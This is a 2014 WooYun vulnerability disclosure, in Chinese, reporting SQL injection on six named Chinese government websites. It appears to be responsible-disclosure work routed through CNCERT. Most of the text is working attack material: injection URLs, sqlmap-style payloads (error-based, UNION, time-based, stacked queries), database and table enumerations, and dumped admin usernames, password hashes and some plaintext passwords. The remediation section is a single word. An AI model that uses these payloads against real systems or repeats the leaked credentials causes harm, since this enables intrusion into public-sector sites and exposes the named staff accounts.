当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073530

漏洞标题:多个政府事业单位sql注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: T0sk

提交时间:2014-08-25 14:59

修复时间:2014-11-23 15:00

公开时间:2014-11-23 15:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-25: 细节已通知厂商并且等待厂商处理中
2014-08-30: 厂商已经确认,细节仅向厂商公开
2014-09-02: 细节向第三方安全合作伙伴开放
2014-10-24: 细节向核心白帽子及相关领域专家公开
2014-11-03: 细节向普通白帽子公开
2014-11-13: 细节向实习白帽子公开
2014-11-23: 细节向公众公开

简要描述:

详细说明:

1.天津某人力资源保障局多处SQL注射
送上注入点:http://www.tjnklss.gov.cn/gonggao/gonggao_detail.asp?id=144
Host IP: 60.29.182.52
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Keyword Found: 最佳浏览模式
Injection type is Integer
DB Server: MSAccess
Table found: users
Table found: news
Table found: file
Total tables found: 3
Column found: id
Column found: username
Column found: password
Column found: now
Column found: userid
Total tables found: 5
Column found: id
Column found: now
Column found: content
Column found: title
Total tables found: 4
Column found: id
Column found: now
Column found: content
Column found: title
Total tables found: 4
用户名密码就不用我去爆了把 骚年们续吧!

漏洞证明:

2.河北某监督管理局SQL注射
注入点:http://www.hebfda.gov.cn/message/messageManager/messagedetail.jsp?ids=1814
Place: GET
Parameter: ids
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ids=1814 AND 2390=2390
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ids=1814 AND 3541=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(85)||CHR(1
18)||CHR(74),5)
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HISIWEB300
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
current schema (equivalent to database on Oracle): 'HISIWEB300'
current user: 'HISIWEB300'
Database: HISIWEB300
[82 tables]
+-------------------------+
| DB_AUTOEXPORT_CONDITION |
| DB_BASE_CLS |
| DB_CONN |
| DB_DIR_CLS |
| DB_FIELD |
| DB_LOG_TABLE |
| DB_LOG_TRANS |
| DB_NOTION |
| DB_TABLE |
| DB_TABLE_RLT |
| DB_TABLE_TPL |
| DB_TABLE_TYPE |
| DB_TOPIC |
| DB_TRANS |
| DB_TRANS_NODE |
| KEY_INFO |
| NET_INQUEST_APPRASE |
| NET_INQUEST_COLLATION |
| NET_INQUEST_PROBLEM |
| NET_INQUEST_PROBLEM_ASK |
| S_DISK_CODE |
| S_ENTERPRISE_SCOPE |
| S_GROUP |
| S_GROUP_FUNC |
| S_ORGANIZATION |
| S_SECTION |
| S_USER |
| S_USER_GROUP_MANAGER |
| S_USER_LOG |
| TABLE1 |
| TABLE11 |
| TABLE12 |
| TABLE13 |
| TABLE2 |
| TABLE3 |
| TABLE4 |
| TABLE5 |
| TABLE52 |
| TABLE54 |
| TABLE55 |
| TABLE57 |
| TABLE58 |
| TABLE59 |
| TABLE6 |
| TABLE60 |
| TABLE61 |
| TABLE62 |
| TABLE63 |
| TABLE64 |
| TABLE65 |
| TABLE66 |
| TABLE7 |
| TABLE8 |
| TABLE9 |
| WBPP_ACLASS |
| WBPP_AUDIT |
| WBPP_BCLASS |
| WBPP_BOARDSYSMAP |
| WBPP_CCLASS |
| WBPP_COLUMN |
| WBPP_CONTENT |
| WBPP_CONTENT_COPY |
| WBPP_CONTENT_JIU |
| WBPP_CONTENT_NM |
| WBPP_CONTENT_OPTIONS |
| WBPP_CONTENT_PUBDECT |
| WBPP_CONTENT_RELATION |
| WBPP_CONTENT_WJ |
| WBPP_C_TEMPLET |
| WBPP_INFOPUB_OPTIONS |
| WBPP_PUBDECT_MAP |
| WBPP_RC_REFER |
| WBPP_REPLY |
| WBPP_REPORTCITY_NM |
| WBPP_RESOURCE |
| WBPP_R_TEMPLET |
| WBPP_TEMPLET |
| WBPP_TEMP_TYPE |
| WBPP_UPCONTENTCOPY |
| WBPP_WEBSITE |
| WBPP_ZWGK_MAXID |
| WBPP_ZWGK_RELATION |
+-------------------------+
3.安徽某抵制技术院站之多处SQL注射
注入:http://www.ahdzch.gov.cn/news_show.php?art_id=1831
Host IP: 61.191.27.117
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: sq_ahdzch
Tables found:
admin_mod
admin_user
admin_useroption
art_dis_config
article
category
cnt
color_code
comes
company_email
control_sys
cr_columninfo
edit_type
friend_link
honours,info_set
information
iplist
message
product
province
set_value
shusurvey
urls
user
videos
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
yingpin
zhaopin
Columns found:

id
username
userpswd
usertype
realname
date
Data Found: userpswd=32ba855f942bf1e16dbe5cff26427a52
Data Found: username=adminstrator
Data Found: userpswd=f2b2d89009446ca923b171178658b551
Data Found: username=odminstrator
Data Found: userpswd=e069524539ed2dc4dd4c56dc27addbe4
Data Found: username=admin
Data Found: userpswd=e10adc3949ba59abbe56e057f20f883e
Data Found: username=admin1
4.浙江某市工商行政管理局之SQL注射 可导致数据泄漏
注入:http://www.12315.gov.cn/dzgg/dzgg_detail.php?nbxh=3302140000035998
Place: GET
Parameter: nbxh
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nbxh=3302140000035998 AND 9524=9524
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: nbxh=3302140000035998 AND (SELECT 4745 FROM(SELECT COUNT(*),CONCAT(
0x3a6d66613a,(SELECT (CASE WHEN (4745=4745) THEN 1 ELSE 0 END)),0x3a736f703a,FLO
OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 13 columns
Payload: nbxh=3302140000035998 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6
d66613a,0x555a7352576947615977,0x3a736f703a), NULL, NULL, NULL, NULL, NULL, NULL
, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: nbxh=3302140000035998 AND SLEEP(5)
available databases [2]:
[*] gs
[*] information_schema
current database: 'gs'
current user: 'gs@localhost'
Database: gs
[155 tables]
+-----------------------+
| 12315_admin |
| 12315_bggg |
| 12315_bm_flfg |
| 12315_bm_table |
| 12315_bscx |
| 12315_bscx_bg |
| 12315_flfg |
| 12315_flfg_xfwq |
| 12315_fzggnew |
| 12315_jgwmh |
| 12315_kygg |
| 12315_news_file |
| 12315_news_gskx |
| 12315_news_qyxw |
| 12315_qyzx |
| 12315_qyzxd |
| 12315_sbdt |
| 12315_sbfl |
| 12315_sbzs |
| 12315_t |
| 12315_tabledown |
| 12315_tableys |
| 12315_test |
| 12315_xfdt |
| 12315_xfjs |
| 12315_yoyo_file |
| 12315_zfgg |
| 12315_zxgg |
| active_sessions |
| active_sessions_split |
| aic_bgzxnj_yhyz |
| aic_bm_article |
| aic_bm_bz |
| aic_bm_qylx |
| aic_config |
| aic_document |
| aic_hz_qyhznr |
| aic_mchz_tzf |
| aic_qybg_document |
| aic_qymck |
| aic_qynj_document |
| aic_qyzx_document |
| aic_sldj_document |
| aic_wsqybg_qyjbqk |
| aic_wsqykydj |
| aic_wsqymchz |
| aic_wsqynj_qyjbqk |
| aic_wsqyzx_qyjbqk |
| aic_wzba_clscqk |
| aic_wzba_nzqynr |
| aic_wzba_wzqk |
| aic_wzba_wzqynr |
| auth_user |
| auth_user_md5 |
| liu_classmates |
| lo_bdata2 |
| lo_buydata |
| lo_config |
| lo_mbase2 |
| lo_moneybase |
| lo_nbers2 |
| lo_numbers |
| nbu_jianyi |
| nbu_user |
| pw_actions |
| pw_adminset |
| pw_announce |
| pw_attachs |
| pw_banuser |
| pw_bbsinfo |
| pw_config |
| pw_credits |
| pw_favors |
| pw_forums |
| pw_hack |
| pw_medals |
| pw_medalslog |
| pw_membercredit |
| pw_memberinfo |
| pw_members |
| pw_memo |
| pw_msg |
| pw_polls |
| pw_posts |
| pw_schcache |
| pw_sharelinks |
| pw_smiles |
| pw_styles |
| pw_threads |
| pw_tmsgs |
| pw_usergroups |
| pw_wordfb |
| stock_ai |
| stock_bighome |
| stock_client |
| stock_gupiaoconfig |
| stock_rndevent |
| stock_stocknews |
| trade_commerce |
| trade_gqsj |
| trade_gqsj_pic |
| trade_guestbook |
| trade_hr_bbsmaster |
| trade_hr_lymaster |
| trade_hr_news |
| trade_hr_qzbd |
| trade_hr_rcsc |
| trade_hr_school |
| trade_hr_wmzs |
| trade_hr_yp |
| trade_hr_zcfg |
| trade_hr_zp |
| trade_hr_zwsc |
| trade_inquire |
| trade_jmzx |
| trade_job |
| trade_job_dc |
| trade_job_news |
| trade_job_pic |
| trade_member |
| trade_member_gr |
| trade_member_qy |
| trade_news_pic |
| trade_popedom |
| trade_production |
| trade_production_pic |
| trade_tennis |
| trade_user_count |
| trade_zhxx |
| xy_blxwjl |
| xy_bsqsysb |
| xy_cost |
| xy_count |
| xy_cysbqk |
| xy_dcdy |
| xy_fddbrqk |
| xy_frgdqk |
| xy_gdsjczqk |
| xy_gdyczqk |
| xy_ggqk |
| xy_htjz |
| xy_member |
| xy_njqk |
| xy_queryhistory |
| xy_qydjqk |
| xy_wzqk |
| xy_xksyqk |
| xy_zrrgdqk |
| young_advice |
| young_learn |
| young_news |
| zhxx |
| zhzx_zlkt |
| zwzx_hyxw |
| zwzx_zhzz |
+-----------------------+
Database: gs
Table: 12315_admin
[5 columns]
+----------+----------+
| Column | Type |
+----------+----------+
| ip | char(80) |
| lstdate | datetime |
| name | char(20) |
| password | char(20) |
| username | char(20) |
+----------+----------+
Database: gs
Table: 12315_admin
[7 entries]
+------------+
| username |
+------------+
| caizhixi |
| chengyong |
| linbin |
| weijie |
| wyg |
| zhangaitao |
| zhourong |
+------------+
Database: gs
Table: 12315_admin
[7 entries]
+----------+
| password |
+----------+
| 850613 |
| 86880332 |
| 86880332 |
| 86888683 |
| 86899505 |
| 88960036 |
| kangfu |
+----------+
5.湖北某市规划局之SQL注射
注入:http://www.hbhggh.gov.cn/search.aspx?keywords=
Place: GET
Parameter: keywords
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keywords=%' AND 6413=CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(97)+CHAR(
119)+CHAR(58)+(SELECT (CASE WHEN (6413=6413) THEN CHAR(49) ELSE CHAR(48) END))+C
HAR(58)+CHAR(122)+CHAR(120)+CHAR(99)+CHAR(58))) AND '%'='
available databases [5]:
[*] huanggang_news
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'huanggang_news'
current user: 'huanggang_news'
Database: huanggang_news
[40 tables]
+---------------------------+
| dbo.lh_advert |
| dbo.lh_advert_banner |
| dbo.lh_application |
| dbo.lh_article |
| dbo.lh_article_albums |
| dbo.lh_article_news |
| dbo.lh_article_video |
| dbo.lh_comments |
| dbo.lh_comments_content |
| dbo.lh_construction |
| dbo.lh_departments |
| dbo.lh_directory |
| dbo.lh_download |
| dbo.lh_feedback |
| dbo.lh_illustrate |
| dbo.lh_land_planning |
| dbo.lh_law_guide |
| dbo.lh_leadership |
| dbo.lh_link |
| dbo.lh_link_type |
| dbo.lh_manager |
| dbo.lh_manager_log |
| dbo.lh_manager_role |
| dbo.lh_manager_role_value |
| dbo.lh_plait |
| dbo.lh_planning |
| dbo.lh_project_handle |
| dbo.lh_submissions |
| dbo.lh_surver_nav |
| dbo.lh_survey |
| dbo.lh_sys_channel |
| dbo.lh_sys_model |
| dbo.lh_sys_model_nav |
| dbo.lh_tj |
| dbo.lh_twounits |
| dbo.lh_zxft |
| dbo.sys_document |
| dbo.view_article_news |
| dbo.view_article_plait |
| dbo.view_article_video |
+---------------------------+
Database: huanggang_news
Table: dbo.lh_manager
[10 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| add_time | datetime |
| email | nvarchar |
| id | int |
| is_lock | int |
| real_name | nvarchar |
| role_id | int |
| role_type | int |
| telephone | nvarchar |
| user_name | nvarchar |
| user_pwd | nvarchar |
+-----------+----------+
Database: huanggang_news
Table: dbo.lh_manager
[2 entries]
+------------------+
| user_pwd |
+------------------+
| 2468D0B735D36F16 |
| 40E388648427806F |
+------------------+
Database: huanggang_news
Table: dbo.lh_manager
[21 entries]
+-------------+
| user_name |
+-------------+
| admin |
| chencheng |
| dongyuan |
| hefang |
| huangzhiyi |
| libin |
| liqingquan |
| mazheng |
| meixinxiang |
| pengpeng |
| shaozhen |
| sharuoling |
| tongjiqun |
| wang |
| wangbiyong |
| wuzhiliang |
| xiaquanxi |
| xuwenyu |
| zgk |
| zhaixitong |
| zhanyuemei |
+-------------+
6.山西大同某政府信息公开网之SQL注射 数据泄漏
注入:http://www.sxdt.gov.cn:8080/contents.php?id=7909
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=7909' AND 1390=CONVERT(INT,(CHAR(58)+CHAR(100)+CHAR(106)+CHAR(10
7)+CHAR(58)+(SELECT (CASE WHEN (1390=1390) THEN CHAR(49) ELSE CHAR(48) END))+CHA
R(58)+CHAR(104)+CHAR(117)+CHAR(112)+CHAR(58))) AND 'vLmF'='vLmF
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=7909' UNION ALL SELECT NULL, CHAR(58)+CHAR(100)+CHAR(106)+CHAR(1
07)+CHAR(58)+CHAR(102)+CHAR(114)+CHAR(71)+CHAR(102)+CHAR(69)+CHAR(67)+CHAR(81)+C
HAR(65)+CHAR(68)+CHAR(104)+CHAR(58)+CHAR(104)+CHAR(117)+CHAR(112)+CHAR(58), NULL
, NULL, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=7909'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=7909' WAITFOR DELAY '0:0:5'--
available databases [6]:
[*] DTSitefactory
[*] DTSiteWeaver
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'DTSitefactory'
current user: 'NT AUTHORITY\\SYSTEM'
Database: DTSitefactory
[178 tables]
+----------------------------------------+
| dbo.PE_AdZone |
| dbo.PE_Address |
| dbo.PE_Admin |
| dbo.PE_AdminProfile |
| dbo.PE_AdminShortCutContent |
| dbo.PE_Admin_Roles |
| dbo.PE_Advertisement |
| dbo.PE_Author |
| dbo.PE_Bank |
| dbo.PE_BankrollItem |
| dbo.PE_Cards |
| dbo.PE_Client |
| dbo.PE_ClientAnnal |
| dbo.PE_CollectionExclosion |
| dbo.PE_CollectionFieldRules |
| dbo.PE_CollectionFilterRules |
| dbo.PE_CollectionHistory |
| dbo.PE_CollectionItem |
| dbo.PE_CollectionListRules |
| dbo.PE_CollectionPagingRules |
| dbo.PE_Comment |
| dbo.PE_CommentPK |
| dbo.PE_CommonModel |
| dbo.PE_CommonProduct |
| dbo.PE_Company |
| dbo.PE_ComplainItem |
| dbo.PE_Contacter |
| dbo.PE_ContentCharge |
| dbo.PE_ContentPermission |
| dbo.PE_CorrelativeItems |
| dbo.PE_Coupon |
| dbo.PE_CouponItem |
| dbo.PE_Courier |
| dbo.PE_DeliverCharge |
| dbo.PE_DeliverItem |
| dbo.PE_DeliverType |
| dbo.PE_Dictionary |
| dbo.PE_DownServer |
| dbo.PE_DownloadError |
| dbo.PE_Favorite |
| dbo.PE_Files |
| dbo.PE_FlowProcess |
| dbo.PE_Friend |
| dbo.PE_GV_ApplicationForm |
| dbo.PE_GV_ApplicationFormHistory |
| dbo.PE_GV_Complaints |
| dbo.PE_GV_ComplaintsClass |
| dbo.PE_GV_ComplaintsResults |
| dbo.PE_GV_Department |
| dbo.PE_GV_DepartmentPermissions |
| dbo.PE_GV_PublicCatalog |
| dbo.PE_GV_PublicInfoTheme |
| dbo.PE_GV_PublicInformation |
| dbo.PE_GroupFieldPermissions |
| dbo.PE_GroupNodePermissions |
| dbo.PE_GroupSpecialCategoryPermissions |
| dbo.PE_GroupSpecialPermissions |
| dbo.PE_IncludeFile |
| dbo.PE_InfoFileRelation |
| dbo.PE_InfoNextProcessRoles |
| dbo.PE_InsideLink |
| dbo.PE_InvoiceItem |
| dbo.PE_KeywordRelationShip |
| dbo.PE_Keywords |
| dbo.PE_Log |
| dbo.PE_MailList |
| dbo.PE_MailList_SubscriptionItem |
| dbo.PE_Message |
| dbo.PE_Model |
| dbo.PE_ModelTemplates |
| dbo.PE_Nodes |
| dbo.PE_Nodes_Model_Template |
| dbo.PE_Nodes_Template |
| dbo.PE_OrderFeedback |
| dbo.PE_OrderHistory |
| dbo.PE_OrderItem |
| dbo.PE_Orders |
| dbo.PE_OutOfStockLog |
| dbo.PE_Package |
| dbo.PE_PayPlatForm |
| dbo.PE_PaymentLog |
| dbo.PE_PaymentType |
| dbo.PE_PointLog |
| dbo.PE_Present |
| dbo.PE_PresentProject |
| dbo.PE_ProcessStatusCode |
| dbo.PE_Process_Roles |
| dbo.PE_Producer |
| dbo.PE_ProductData |
| dbo.PE_ProductPrice |
| dbo.PE_QA_Category |
| dbo.PE_QA_Comment |
| dbo.PE_QA_Honor |
| dbo.PE_QA_HonorType |
| dbo.PE_QA_PointLog |
| dbo.PE_QA_Question |
| dbo.PE_QA_Reply |
| dbo.PE_Region |
| dbo.PE_RemindItem |
| dbo.PE_Role_Field_Permissions |
| dbo.PE_Role_Node_Permissions |
| dbo.PE_Role_Special_Permissions |
| dbo.PE_Roles |
| dbo.PE_Roles_Permissions |
| dbo.PE_ServiceItem |
| dbo.PE_ShoppingCarts |
| dbo.PE_SigninContent |
| dbo.PE_SigninLog |
| dbo.PE_Source |
| dbo.PE_SpecialCategory |
| dbo.PE_SpecialInfos |
| dbo.PE_Specials |
| dbo.PE_StatAddress |
| dbo.PE_StatBrowser |
| dbo.PE_StatColor |
| dbo.PE_StatDay |
| dbo.PE_StatInfoList |
| dbo.PE_StatIp |
| dbo.PE_StatIpInfo |
| dbo.PE_StatKeyword |
| dbo.PE_StatMonth |
| dbo.PE_StatMozilla |
| dbo.PE_StatOnline |
| dbo.PE_StatRefer |
| dbo.PE_StatScreen |
| dbo.PE_StatSystem |
| dbo.PE_StatTimezone |
| dbo.PE_StatVisit |
| dbo.PE_StatVisitor |
| dbo.PE_StatWeburl |
| dbo.PE_StatWeek |
| dbo.PE_StatYear |
| dbo.PE_Status |
| dbo.PE_Stock |
| dbo.PE_StockItem |
| dbo.PE_SubscriptionItems |
| dbo.PE_Survey |
| dbo.PE_SurveyVote |
| dbo.PE_Trademark |
| dbo.PE_TransferLog |
| dbo.PE_U_Announce |
| dbo.PE_U_Article |
| dbo.PE_U_Audio |
| dbo.PE_U_Book |
| dbo.PE_U_Camera |
| dbo.PE_U_Card |
| dbo.PE_U_Clothing |
| dbo.PE_U_CompanyText |
| dbo.PE_U_Computer |
| dbo.PE_U_Cosmetic |
| dbo.PE_U_Flash |
| dbo.PE_U_FriendSite |
| dbo.PE_U_GuestBook |
| dbo.PE_U_Mobile |
| dbo.PE_U_Music |
| dbo.PE_U_OrderText |
| dbo.PE_U_Photo |
| dbo.PE_U_PortableComputer |
| dbo.PE_U_Product |
| dbo.PE_U_PublicInformation |
| dbo.PE_U_RedirectLink |
| dbo.PE_U_Soft |
| dbo.PE_U_UserText |
| dbo.PE_U_Video |
| dbo.PE_UserGroups |
| dbo.PE_Users |
| dbo.PE_ValidLog |
| dbo.PE_Version |
| dbo.PE_Vote |
| dbo.PE_WordReplaceItem |
| dbo.PE_Work |
| dbo.PE_WorkCategory |
| dbo.PE_WorkCategoryCustomForm |
| dbo.PE_WorkFlows |
| dbo.PE_WorkNextProcessRoles |
| dbo.PE_Zone_Advertisement |
| dbo.dtproperties |
| dbo.hy_info |
+----------------------------------------+
Database: DTSitefactory
Table: dbo.PE_Admin
[15 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| AdminID | int |
| AdminName | nvarchar |
| AdminPassword | nvarchar |
| EnableModifyPassword | bit |
| EnableMultiLogin | bit |
| Hash | nvarchar |
| IsLock | bit |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LastModifyPasswordTime | datetime |
| LoginErrorTimes | int |
| LoginTimes | int |
| RndPassword | nvarchar |
| UserName | nvarchar |
+------------------------+----------+
Database: DTSitefactory
Table: dbo.PE_Admin
[105 entries]
+------------+
| AdminName |
+------------+
| admin |
| cqzf |
| dthg |
| dtmhglj |
| dtxzf |
| gjtjjdtdcd |
| glxzf |
| gsj |
| gtzyj |
| hyxzf |
| jgj |
| kfq |
| kqzf |
| lqxzf |
| lyh |
| lyj |
| njqzf |
| sajj |
| schj |
| sczj |
| sdaj |
| sdlgs |
| sdsj |
| sdzj |
| sfgj |
| sfgw |
| sfpb |
| sfzyjzx |
| sgaj |
| sgbj |
| sgfkgb |
| sghj |
| sgjaqj |
| sglj |
| sgsj |
| sgtj |
| sgzjdgwh |
| shbj |
| shg |
| sjcj |
| sjgj |
| sjgswj |
| sjjzd |
| sjsw |
| sjswyh |
| sjtj |
| sjw |
| sjyj |
| skjj |
| sldj |
| slsj |
| slyj |
| smkaqjcfj |
| smtgyj |
| smtj |
| smzj |
| snjj |
| snw |
| snywyh |
| sqxj |
| srfbgs |
| srsj |
| srskszx |
| ssfj |
| ssjj |
| sswj |
| stjj |
| stsg |
| stxj |
| styj |
| swgxj |
| swj |
| swjj |
| swsj |
| swszfxwzx |
| swwj |
| swzj |
| sxzxy |
| sycj |
| syjfj |
| syjj |
| sysj |
| sywj |
| syzj |
| szfcgzx |
| szfcss |
| szffzb |
| szfgjj |
| szfgjjglzx |
| szfwsb |
| szfyjb |
| szfyjs |
| szgwh |
| szjj |
| szxqyj |
| tzxzf |
| xrqzf |
| ygxzf |
| yh |
| zgrmyh |
| zjj |
| zxcjw |
| zxyhy |
| zy |
| zyxzf |
+------------+
Database: DTSitefactory
Table: dbo.PE_Admin
[39 entries]
+----------------------------------+
| AdminPassword |
+----------------------------------+
| 090c34fbccfa968137428a3582dd0a8c |
| 1b12ae93509903575fc2d4673d76476d |
| 1c92ca93b6f151eb9b2c315f5915f409 |
| 285ff5925974f4eba8bb139adb792a8b |
| 299f7491f2ff1c68241162099fd06a4a |
| 37be8dbf2bc62cb926716c56f66b1829 |
| 3d9188577cc9bfe9291ac66b5cc872b7 |
| 45d47261347fd9b6c390cc5e5a01e6ef |
| 46c015e6e0f2a4b15a770422ee7a65a8 |
| 5156e498221953ba09bf6a9246a23707 |
| 53d85e1e2c4e2d3572e1c48d58f8143f |
| 5ebda4a10fb59bf3a41132a803de366e |
| 5efa6353c03dd77bec5094ae53cc528b |
| 600b4797ae468d8f2ce8888fd9650aa2 |
| 616fe4a80f5d81072a35636069df653c |
| 670b14728ad9902aecba32e22fa4f6bd |
| 6a84fed192d3d383f269290d3c68b7c5 |
| 6c1c9336ef07b7f4595fcb78463babb2 |
| 84449b20f4c38c6d8d75342bee77d6d8 |
| 87f07c608e0345c40038e2d4899c45e2 |
| 958bf7ba0925274f95d128317cfca104 |
| 96e79218965eb72c92a549dd5a330112 |
| 97c4de3636fdb3a35aea6107dc6094eb |
| 985d9d52ad376f0b8d27367e13fa7eb1 |
| a0e49eb3012289df21ea7bd24407e603 |
| b0baee9d279d34fa1dfd71aadb908c3f |
| b59c67bf196a4758191e42f76670ceba |
| c33367701511b4f6020ec61ded352059 |
| d320fe2508d6dbbd97efe367e2798408 |
| d3d6ac4669729a986b637a08ecd808ad |
| dacdce23276e1b303cae449c77424170 |
| de36885efea08b25b7829bebbd82fd23 |
| de5192c2fa87cdc25f3e9a14c8a29e57 |
| e3ceb5881a0a1fdaad01296d7554868d |
| e52381f56b14d53cf0b541e083a9ec22 |
| ee8d5a123229d8cf2c5f303f61e10711 |
| efcc59ca7936f0cdce21227d2b993604 |
| f2ab77ea9afb2235f290e074eebf3a91 |
| f3903c7f9136c3653e37a0ac13b5ed63 |
+----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 T0sk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-30 10:27

厂商回复:

最新状态:

暂无


漏洞评价:

评论